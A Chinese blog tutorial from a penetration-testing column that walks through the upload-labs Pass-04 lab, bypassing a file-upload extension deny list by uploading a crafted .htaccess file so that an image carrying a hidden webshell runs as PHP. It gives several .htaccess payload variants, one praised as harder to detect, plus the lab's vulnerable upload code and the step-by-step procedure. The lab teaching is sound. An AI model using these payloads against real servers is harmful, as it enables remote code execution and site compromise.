【文件上传绕过】——解析漏洞_.htaccess文件解析漏洞

渗透测试 专栏收录该内容
18 篇文章 4 订阅

一、实验目的:

1、了解什么是.htaccess文件
2、通过upload-labs闯关游戏(Pass-04),掌握.htaccess文件解析漏洞技术。

二、工具:

cmd命令行
火狐/谷歌浏览器

三、实验环境:

靶 机: windows10虚拟机:192.168.100.150
      upload-labs-master闯关游戏
      phpstudy2018搭建网站
      php5.6以下不带nts的版本
      服务器没有禁止.htaccess文件的上传,且服务商允许用户使用自定义.htaccess文件

攻击机: 物理机

四、漏洞利用前提:

  web具体应用没有禁止.htaccess文件的上传,同时web服务器提供商允许用户上传自定义的.htaccess文件

五、原理:

.htaccess文件(或者"分布式配置文件") ,全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法,即,在一个特定的文档目录中放置一个包含一个或多个指令的文件,以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。

六、利用方式:

上传覆盖.htaccess文件,重写解析规则,将上传的带有脚本马的图片以脚本方式解析。

七、.htaccess文件内容:

.htaccess文件解析规则的增加,是可以按照组合的方式去做的,不过具体得自己多测试。
第一种、虽然好用,但是会误伤其他正常文件,容易被发现:

<IfModule mime_module>
AddHandler php5-script .gif          #在当前目录下,只针对gif文件会解析成Php代码执行
SetHandler application/x-httpd-php    #在当前目录下,所有文件都会被解析成php代码执行
</IfModule>

第二种、精确控制能被解析成php代码的文件,不容易被发现:

<FilesMatch "evil.gif">
SetHandler application/x-httpd-php   #在当前目录下,如果匹配到evil.gif文件,则被解析成PHP代码执行
AddHandler php5-script .gif          #在当前目录下,如果匹配到evil.gif文件,则被解析成PHP代码执行
</FilesMatch>

第三种、同1没太大区别:

<IfModule mime_module>
AddType application/x-httpd-php .gif
</IfModule>

八、.htaccess文件制作:

创建好文件后,把上面的.htaccess文件内容通过文本文档的方式复制进去即可,内容需要根据实际情况进行适当修改。

1. 直接创建文件:


2. 通过cmd命令行创建:

有的电脑无法通过桌面直接创建,就需要通过命令行进行创建:
命令:

echo hello world > .htaccess

九、实验过程:

upload-labs闯关游戏(Pass-04):
页面源码:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

1、创建一个.htaccess文件.htaccess文件文件内容中的规则这里使用上面的第二种方法,内容如下:
注:上传这个文件的原因是为了把1.png图片马解析为php的脚本文件。
这里在写.htaccess文件内容时,需要去掉每行结尾的多余的空格:

<FilesMatch "1.png">
SetHandler application/x-httpd-php
AddHandler php5-script .png
</FilesMatch>


2、选择upload-labs闯关游戏(Pass-04)先上传上面写好的.htaccess文件

3、上传一个图片马1.png,并复制图片马的链接:

4、访问图片马的链接后,发现已经把1.png解析为php脚本文件:

  • 2
    点赞
  • 0
    评论
  • 3
    收藏
  • 一键三连
    一键三连
  • 扫一扫,分享海报

©️2021 CSDN 皮肤主题: 1024 设计师:白松林 返回首页
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值